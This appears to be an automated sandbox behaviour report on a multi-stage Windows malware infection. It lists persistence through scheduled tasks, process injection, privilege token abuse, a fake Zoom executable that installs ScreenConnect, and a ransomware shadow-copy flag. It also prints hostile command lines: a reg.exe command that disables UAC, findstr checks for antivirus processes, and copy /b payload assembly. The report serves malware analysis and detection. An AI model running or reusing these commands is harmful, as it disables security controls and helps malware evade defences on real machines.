Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob C:\Users\Admin\AppData\Local\Temp\a\noyjhoadw.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob C:\Users\Admin\AppData\Local\Temp\a\noyjhoadw.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 C:\Users\Admin\AppData\Local\Temp\634977\Surrey.com N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob C:\Users\Admin\AppData\Local\Temp\634977\Surrey.com N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 C:\Users\Admin\AppData\Local\Temp\a\noyjhoadw.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\634977\Surrey.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\634977\Surrey.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\634977\Surrey.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\windows.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\windows.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\windows.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\Update.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\T.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\T.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\T.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\T.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\T.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\T.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\T.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\T.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\T.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\T.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\T.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\T.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\T.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\T.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\T.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\T.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\Enalib.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\Enalib.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\Enalib.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\Enalib.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\Enalib.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\Enalib.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\Enalib.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\Enalib.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\Enalib.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\Enalib.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\Enalib.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\Enalib.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\Enalib.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\Enalib.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\Enalib.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\Enalib.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\rea.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\server.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\MSystem32.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\ProgramData\Bitdefender\$77-Bitdefender.exe N/A
N/A N/A \??\c:\program files (x86)\internet explorer\iexplore.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\rea.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\a\Update.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\a\zoom_invitecode=23884232.zoom.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2508 wrote to memory of 2348 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe
PID 2508 wrote to memory of 2348 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe
PID 2508 wrote to memory of 2348 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe
PID 2508 wrote to memory of 2348 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe
PID 2508 wrote to memory of 3060 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\ProgramData\Synaptics\Synaptics.exe
PID 2508 wrote to memory of 3060 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\ProgramData\Synaptics\Synaptics.exe
PID 2508 wrote to memory of 3060 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\ProgramData\Synaptics\Synaptics.exe
PID 2508 wrote to memory of 3060 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\ProgramData\Synaptics\Synaptics.exe
PID 3060 wrote to memory of 2908 N/A C:\ProgramData\Synaptics\Synaptics.exe C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe
PID 3060 wrote to memory of 2908 N/A C:\ProgramData\Synaptics\Synaptics.exe C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe
PID 3060 wrote to memory of 2908 N/A C:\ProgramData\Synaptics\Synaptics.exe C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe
PID 3060 wrote to memory of 2908 N/A C:\ProgramData\Synaptics\Synaptics.exe C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe
PID 2908 wrote to memory of 2160 N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe C:\Users\Admin\AppData\Local\Temp\a\1.exe
PID 2908 wrote to memory of 2160 N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe C:\Users\Admin\AppData\Local\Temp\a\1.exe
PID 2908 wrote to memory of 2160 N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe C:\Users\Admin\AppData\Local\Temp\a\1.exe
PID 2908 wrote to memory of 2160 N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe C:\Users\Admin\AppData\Local\Temp\a\1.exe
PID 2160 wrote to memory of 1472 N/A C:\Users\Admin\AppData\Local\Temp\a\1.exe C:\Windows\SysWOW64\cmd.exe
PID 2160 wrote to memory of 1472 N/A C:\Users\Admin\AppData\Local\Temp\a\1.exe C:\Windows\SysWOW64\cmd.exe
PID 2160 wrote to memory of 1472 N/A C:\Users\Admin\AppData\Local\Temp\a\1.exe C:\Windows\SysWOW64\cmd.exe
PID 2160 wrote to memory of 1472 N/A C:\Users\Admin\AppData\Local\Temp\a\1.exe C:\Windows\SysWOW64\cmd.exe
PID 2348 wrote to memory of 1080 N/A C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\test.exe
PID 2348 wrote to memory of 1080 N/A C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\test.exe
PID 2348 wrote to memory of 1080 N/A C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\test.exe
PID 2348 wrote to memory of 1080 N/A C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\test.exe
PID 2908 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe C:\Users\Admin\AppData\Local\Temp\a\Update.exe
PID 2908 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe C:\Users\Admin\AppData\Local\Temp\a\Update.exe
PID 2908 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe C:\Users\Admin\AppData\Local\Temp\a\Update.exe
PID 2908 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe C:\Users\Admin\AppData\Local\Temp\a\Update.exe
PID 2908 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe C:\Users\Admin\AppData\Local\Temp\a\Update.exe
PID 2908 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe C:\Users\Admin\AppData\Local\Temp\a\Update.exe
PID 2908 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe C:\Users\Admin\AppData\Local\Temp\a\Update.exe
PID 1472 wrote to memory of 2580 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1472 wrote to memory of 2580 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1472 wrote to memory of 2580 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1472 wrote to memory of 2580 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1472 wrote to memory of 2312 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1472 wrote to memory of 2312 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1472 wrote to memory of 2312 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1472 wrote to memory of 2312 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 2908 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe C:\Users\Admin\AppData\Local\Temp\a\zoom_invitecode=23884232.zoom.exe
PID 2908 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe C:\Users\Admin\AppData\Local\Temp\a\zoom_invitecode=23884232.zoom.exe
PID 2908 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe C:\Users\Admin\AppData\Local\Temp\a\zoom_invitecode=23884232.zoom.exe
PID 2908 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe C:\Users\Admin\AppData\Local\Temp\a\zoom_invitecode=23884232.zoom.exe
PID 1472 wrote to memory of 1672 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1472 wrote to memory of 1672 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1472 wrote to memory of 1672 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1472 wrote to memory of 1672 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1472 wrote to memory of 4112 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1472 wrote to memory of 4112 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1472 wrote to memory of 4112 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1472 wrote to memory of 4112 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 5104 wrote to memory of 1592 N/A C:\Users\Admin\AppData\Local\Temp\a\zoom_invitecode=23884232.zoom.exe C:\Windows\SysWOW64\msiexec.exe
PID 5104 wrote to memory of 1592 N/A C:\Users\Admin\AppData\Local\Temp\a\zoom_invitecode=23884232.zoom.exe C:\Windows\SysWOW64\msiexec.exe
PID 5104 wrote to memory of 1592 N/A C:\Users\Admin\AppData\Local\Temp\a\zoom_invitecode=23884232.zoom.exe C:\Windows\SysWOW64\msiexec.exe
PID 5104 wrote to memory of 1592 N/A C:\Users\Admin\AppData\Local\Temp\a\zoom_invitecode=23884232.zoom.exe C:\Windows\SysWOW64\msiexec.exe
PID 5104 wrote to memory of 1592 N/A C:\Users\Admin\AppData\Local\Temp\a\zoom_invitecode=23884232.zoom.exe C:\Windows\SysWOW64\msiexec.exe
PID 5104 wrote to memory of 1592 N/A C:\Users\Admin\AppData\Local\Temp\a\zoom_invitecode=23884232.zoom.exe C:\Windows\SysWOW64\msiexec.exe
PID 5104 wrote to memory of 1592 N/A C:\Users\Admin\AppData\Local\Temp\a\zoom_invitecode=23884232.zoom.exe C:\Windows\SysWOW64\msiexec.exe
PID 1472 wrote to memory of 4364 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1472 wrote to memory of 4364 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1472 wrote to memory of 4364 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1472 wrote to memory of 4364 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1472 wrote to memory of 4600 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\extrac32.exe
PID 1472 wrote to memory of 4600 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\extrac32.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe

"C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"

C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe

"C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe"

C:\ProgramData\Synaptics\Synaptics.exe

"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate

C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe

"C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe" InjUpdate

C:\Users\Admin\AppData\Local\Temp\a\1.exe

"C:\Users\Admin\AppData\Local\Temp\a\1.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c copy Universities Universities.cmd & Universities.cmd

C:\Users\Admin\AppData\Local\Temp\a\test.exe

"C:\Users\Admin\AppData\Local\Temp\a\test.exe"

C:\Users\Admin\AppData\Local\Temp\a\Update.exe

"C:\Users\Admin\AppData\Local\Temp\a\Update.exe"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "opssvc wrsa"

C:\Users\Admin\AppData\Local\Temp\a\zoom_invitecode=23884232.zoom.exe

"C:\Users\Admin\AppData\Local\Temp\a\zoom_invitecode=23884232.zoom.exe"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.3.7.9067\0cef7d10d8f459fc\ScreenConnect.ClientSetup.msi"

C:\Windows\SysWOW64\cmd.exe

cmd /c md 634977

C:\Windows\SysWOW64\extrac32.exe

extrac32 /Y /E Gtk

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\SysWOW64\findstr.exe

findstr /V "Constitution" Wagon

C:\Windows\SysWOW64\cmd.exe

cmd /c copy /b 634977\Surrey.com + Firewire + Values + Expanding + Representing + Gothic + Voltage + Refinance + Nec + Kate 634977\Surrey.com

C:\Windows\SysWOW64\cmd.exe

cmd /c copy /b ..\Courage + ..\Remove + ..\Throws + ..\Competing Q

C:\Users\Admin\AppData\Local\Temp\634977\Surrey.com

Surrey.com Q

C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe

"C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe"

C:\Windows\SysWOW64\choice.exe

choice /d y /t 5

C:\Windows\SysWOW64\cmd.exe

/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\install.vbs"

C:\Windows\SysWOW64\reg.exe

C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Users\Admin\AppData\Local\Temp\a\noyjhoadw.exe

"C:\Users\Admin\AppData\Local\Temp\a\noyjhoadw.exe"

C:\Users\Admin\AppData\Local\Temp\a\windows.exe

"C:\Users\Admin\AppData\Local\Temp\a\windows.exe"

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 7DFC0315C2B2425ED030A7470E203C96 C

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSID27B.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_259445449 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments

C:\Users\Admin\AppData\Local\Temp\a\T.exe

"C:\Users\Admin\AppData\Local\Temp\a\T.exe"

C:\Users\Admin\AppData\Local\Temp\a\Enalib.exe

"C:\Users\Admin\AppData\Local\Temp\a\Enalib.exe"

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c "C:\ProgramData\Bitdefender\$77-Bitdefender.exe"

C:\ProgramData\Bitdefender\$77-Bitdefender.exe

C:\ProgramData\Bitdefender\$77-Bitdefender.exe

C:\Users\Admin\AppData\Local\Temp\a\access.exe

"C:\Users\Admin\AppData\Local\Temp\a\access.exe"

C:\Windows\SysWOW64\cmd.exe

/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

\??\c:\program files (x86)\internet explorer\iexplore.exe

"c:\program files (x86)\internet explorer\iexplore.exe"

C:\Windows\SysWOW64\cmd.exe

/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\svchost.exe

svchost.exe

